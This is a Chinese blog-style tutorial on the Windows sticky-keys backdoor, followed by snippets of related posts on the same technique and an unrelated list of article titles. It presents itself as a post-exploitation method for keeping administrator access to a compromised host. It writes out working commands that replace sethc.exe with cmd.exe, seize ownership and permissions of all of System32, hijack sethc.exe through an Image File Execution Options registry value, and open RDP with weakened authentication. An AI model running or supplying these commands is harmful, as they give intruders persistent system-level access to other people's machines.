沾滞键shift后门
目录
1. 简介
2. 后门原理
3. 后门制作
3.1 方法一 cmd覆盖sethc
3.2 方法二 利用注册表修改沾滞键快捷方式
4. shift后门利用
1. 简介
沾滞键的目的是为了帮助那些按键有困难的人设计的,在Windows系统下连续按5次shift键后,系统就会执行system32下的sethc.exe,也就是启用了沾滞键。了解该方法的目的在于在完成渗透后能留下后门让攻击者一直拥有主机的管理员权限。
2. 后门原理
在C盘C:\Windows\System32目录下存在sethc.exe文件,正常情况下会执行sethc.exe文件,但是当我们将cmd.exe文件把sethc.exe文件通过更改名称给覆盖掉,当我们连续按下5次shift后执行的就是“cmd.exe”文件了。
3. 后门制作
3.1 方法一 cmd覆盖sethc
copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe//如果没指定生成的文件,会直接覆盖copy的第二个参数,相当于将第二个参数换成了第一个参数,但是文件外部名称没变
在cmd窗口,输入上面的命令可能出现拒绝访问。
出现上述情况需要将目录下的所有目录和文件、子目录下的所有者更改为管理员组(administrators)命令,
takeown /f c:\windows\system32\*.* /a /r /d y # 获取整个文件夹及其下面子目录文件的所属权
cacls c:\windows\system32\*.* /T /E /G administrators:F # 将所有c:\windows\system32\目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制(删除原有NTFS权限设置)
注销后在登陆界面尝试调用cmd.exe命令行窗口
3.2 方法二 利用注册表修改沾滞键快捷方式
使用如下命令
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
该操作为添加注册表,引号内的内容为要将注册表项添加到"HKLM\......serhc.exe"
/v 是值名为Debugger
/t 是类型为REG_SZ
/d 是数据为"C:\......\cmd.exe"
大致意思是在执行sethc.exe的时候会被cmd.exe给替代了
结果截图如下:
4. shift后门利用
1.配置防火墙允许远程连接3389端口
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
2.开启远程桌面
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /D 0 /f
3.用户身份验证选项
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0
* 在最后参数“0”表示在会开启远程登陆验证,可以远程连接到锁屏登陆界面
* 当值为“1”时,使用远程连接工具携带凭证进行验证,不会看到锁屏登陆界面
4.安全层设置
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0
* “0”是连接前使用 rdp 协议进行身份验证,rdp 即远程桌面连接
* “1”是指在连接前两端协商来进行身份验证,默认值也为“1”
* “2”是使用 tls 协议来进行
测试结果:
总结一波:
总的来说该功能利用更多是在后渗透阶段,对于需要登陆主机,或者在web后门获取的shell上不能满足时。
沾滞键shift后门相关推荐
- win10中关于用粘滞键留下后门
win10中的连按五下Shift键会出现粘滞键,那么怎么利用这一漏洞当作后门,登陆别人电脑呢 先要了解粘滞键和命令提示符的快捷应用是sethc.exe和cmd.exe 而且这两个文件都在win10的c ...
- Windows沾滞键设置
控制面板----轻松使用-----轻松使用设置中心------更改键盘的工作方式 转载于:https://www.cnblogs.com/lwmp/p/6606808.html
- 粘滞键引起的提权实战
在某论坛阅读文章的时候看到一个粘滞键的概念,一时兴起百度了一下,思考了一下发现似乎有后门可以利用 先用我win10虚拟机查看一下win10的粘滞键在什么位置 打开控制面板如下: 找到键盘打开粘滞键 按 ...
- 【权限维持】Windows自启动映像劫持粘滞键辅助屏保后门WinLogon
文章目录 权限维持-域环境&单机版-自启动 权限维持-域环境&单机版-粘滞键 权限维持-域环境&单机版-映像劫持 权限维持-域环境&单机版-屏保&登录 权限维持 ...
- (windows图形化界)粘滞键后门
(windows图形化界)粘滞键后门 思路:windows图形化界面未登入用户时,连按5次Shift键粘滞键的程序依然可以弹出,若若把粘滞键的程序改为其他程序则有不一样的效果(如cmd程序). 一.手 ...
- 5次Shift会触发粘滞键的妙用(转)
1.前提 你可以在平时亲身接触状态电脑,哪怕是在电脑主人不在的时候(虽然主人不在,或者关机了,进入电脑是要密码的). 2.原理 利用电脑连续按5次Shift会触发粘滞键,它会运行c:\winows\s ...
- 关于windows的粘滞键后门漏洞
一.适应范围 该漏洞仅适用于Windows7及以下的windows操作系统. 二.粘滞键介绍 粘滞键是一种快捷键,是为同时按下两个或多个键有困难的人而设计的,要功能是方便Shift.Ctrl.Alt与 ...
- T00ls Lpk Sethc 首创lpk劫持方式粘滞键后门,体积超小!
T00ls Lpk Sethc测试使用视频,看完帖子不明白的看视频马上就明白了 http://Rices.So/lpk.html T00ls同步更新: http://t00ls.net/thread- ...
- lpk劫持方式粘滞键后门后门T00ls Lpk Sethc v3.0 正式版下载
从lpk到lpk2到现在也半年多了 让3.0做个完结吧 该写的功能也写完了 3.0集中修复了几乎所有的bug 包括密码被破解方面的问题 以及windows文件保护的问题! 新增加了wget和后门界面的 ...
最新文章
- 2016年度工作总结
- java中父类与子类的关系以及使用
- linux操作系统教学,Linux操作系统教学视频
- php的htaccess,PHP .htaccess文件详细介绍
- php使用fputcsv进行大数据的导出
- UIKit框架各个类的简介
- leetcode1343. 大小为 K 且平均值大于等于阈值的子数组数目(队列)
- android中sharedPreferences的用法
- 智能控制-模糊控制Matlab函数汇总
- npm install 本地安装与全局安装
- mysql 查出数据后插入新建表
- TCMalloc原理
- 人脸识别实名制管理,推动智慧工地建设发展
- linux执行脚本中方法,Linux中执行shell脚本命令的4种方法总结
- python 获取MP4视频第一帧 | Python工具类
- PTA 7-55 剿灭魔教 (30分)(拓扑排序bfs版)
- poj 3399 Product
- arduino养花平台
- 乐视还有400多位员工?过着没有老板的神仙日子 官方出来回应了...
- DirectUI界面编程(零)简介